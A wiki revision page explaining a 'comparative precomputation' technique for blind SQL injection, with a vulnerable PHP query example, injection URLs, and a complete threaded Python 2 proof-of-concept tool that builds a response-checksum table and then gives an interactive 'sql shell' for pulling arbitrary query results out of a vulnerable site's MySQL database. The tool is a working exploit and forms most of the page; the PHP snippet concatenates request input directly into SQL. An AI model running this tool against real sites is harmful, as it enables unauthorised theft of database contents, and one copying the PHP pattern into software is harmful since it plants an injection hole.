Difference between revisions of "SQL injection/Blind/Extraction/Precomputation"

Revision as of 07:40, 15 November 2012

Response-based data extraction allows for blind SQL injection exploitation to retrieve, in some cases, more than a single byte from the remote SQL database.

The author was able to determine that there are at least two ways to perform this task:

A timing attack, more suited for a LAN (Local Area Network)
A comparative precomputation attack, more suited for the WAN (Wide Area Network, or in this case, the internet)

This document focuses on the latter, for realistic exploitation demonstration.

The comparative precomputation attack

This attack heavily relies on the remote dataset for successful exploitation and thus its rate of data retrieval is more variable than other methods.

Requirements: Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context (column and table names). In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data

Precomputation is done for performance and efficiency purposes. At the very least, a comparative test will be required - without precomputation, it is expected that ram usage may skyrocket. The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.

Theory

The example in this section will rarely (if ever) work in the wild. It is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later. (skip to advanced explanation)

Take the following query

$query = "select * from articles where id=" . $_GET['id'];

Being executed at the following uri:

 /articles.php?id=1

Assume, for one moment, that there are 255 rows with sequential id's starting at 1 in the articles table. It will rarely ever be this way in the wild.

First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.

To determine the ascii code of the first character of the sql version, an attacker might visit:

 /articles.php?id=ascii(substring(version() from 1 for 1))

The attacker would then take a checksum of the returned html data and lookup the value of the id when this checksum was found during the initial crawl.

Proof of Concept

#!/usr/bin/python2
import sys
import urllib2
import time
from binascii import hexlify
import _mysql
import md5
import pickle
import re
import os
import threading
import Queue
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
 
BOLD = '\033[1m'
BLUE = '\033[34m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[91m'
ENDC = '\033[0m'
 
def request(request_url):
  req = urllib2.Request(request_url)
  req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
  r = urllib2.urlopen(req)
  return r.read()
 
def construct_discovery_query(url, column, table, counter):
  discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
  discovery =  discovery % (column, column, table, counter)
  return url + urllib2.quote(discovery)
 
def construct_injection_query(url, column, table, query, position):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
  injection = injection % (column, column, table, query, position)
  return url + urllib2.quote(injection)
 
def get_length(url, column, table, query, ascii_table, counter):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
  length_length = url + urllib2.quote(injection)
  length_length = ascii_table[md5.new(request(length_length)).digest()]
  counter += 1
 
  length = ""
  for i in range(1,length_length+1):
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))" 
    injection = injection % (column, column, table, query, i)
    request_url = url + urllib2.quote(injection)
    length += chr(ascii_table[md5.new(request(request_url)).digest()])
    counter += 1
 
  return (int(length), counter)
 
def get_query(prompt):
  while 1:
    query = raw_input(prompt)
    if query != "":
      break
  return query
 
def do_query(url, column, table, query, ascii_table, i, q):
  tmp = construct_injection_query(url, column, table, query, i)
  q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
 
def do_table(url, column, table, i, q):
  tmp = construct_discovery_query(url, column, table, i)
  q.put(md5.new(request(tmp)).digest())
 
def print_percent(percent, start_time):
  elapsed_time = time.time() - start_time
  eta = ((elapsed_time) / percent) * 100 - elapsed_time
  sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
  sys.stdout.flush()
 
def do_thread(target, args, counter, length, type_query):
  if type_query == 0:
    ascii_table = {}
  else:
    query_result = ""
 
  if type_query == 0:
    i = 0
  else:
    i = 1
 
 
  sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
  sys.stdout.flush()
  start_time = time.time()
 
  while i < length:
    threads = {}
    queues  = []
 
    for j in range(0,11):
      if i < length:
        queues.append(Queue.Queue())
        threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
        i += 1
        counter += 1
        print_percent(100 * float(i) / float(length), start_time)
 
    for thread in threads:
      threads[thread].start()
 
    for j, thread in enumerate(sorted(threads.iterkeys())):
      if type_query == 0:
        ascii_table[queues[j].get()] = thread
      else:
        query_result += queues[j].get()
      threads[thread].join()
 
  sys.stdout.write('\n')
  sys.stdout.flush()
 
  if type_query == 0:
    return ascii_table
  else:
    return (counter, query_result)
 
def main(url, column, table):
  session_name = re.split("(https?://)?(.*)/", url)[2]
 
  print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
  try:
    try:
      os.stat("data")
    except:
      os.mkdir("data")
    ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
    print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
  except:
    print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
    current = time.time()
    ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
    pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
    print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
 
  print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
 
  while 1:
    query = get_query("%ssql shell>%s " % (BOLD, ENDC))
    if query == "exit":
      break
 
    query_result = ""
    counter = 0
    current = time.time()
    (length, counter) = get_length(url, column, table, query, ascii_table, counter)
 
    (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
 
    query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
    mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
    mysql_connection.query(query)
    result = mysql_connection.use_result()
    data = result.fetch_row()[0][0]
    mysql_connection.close()
 
    print data
    print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
 
  print "%s[*]%s Good bye" % (GREEN, ENDC)
 
if __name__=="__main__":
  if len(sys.argv) != 4:
    print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
    exit()
 
  print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
  main(sys.argv[1], sys.argv[2], sys.argv[3])

@@ Line 19: / Line 19: @@
 Precomputation is done for performance and efficiency purposes.  At the very least, a comparative test will be required - without precomputation, it is expected that ram usage may skyrocket.  The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.
-=== The theory ===
+== Theory ==
 The example in this section will rarely (if ever) work in the wild.  It is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later.  (skip to advanced explanation)
 * Take the following query
 {{code|text=<source lang="php">  $query = "select * from articles where id=" . $_GET['id']; </source>}}
-* Assume that the above query executed between the following uri's is valid with a unique results set and sequential id's between them:
+* Being executed at the following uri:
    /articles.php?id=1
-  /articles.php?id=2
-  '''...'''
-  /articles.php?id=255
+* Assume, for one moment, that there are 255 rows with sequential id's starting at 1 in the articles table.  It will rarely ever be this way in the wild.
 * First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.
@@ Line 40: / Line 38: @@
+== Proof of Concept ==

Difference between revisions of "SQL injection/Blind/Extraction/Precomputation"

Revision as of 07:40, 15 November 2012

The comparative precomputation attack

Theory

Proof of Concept

Navigation menu

Views

Personal tools

Wiki

Community

Search

Tools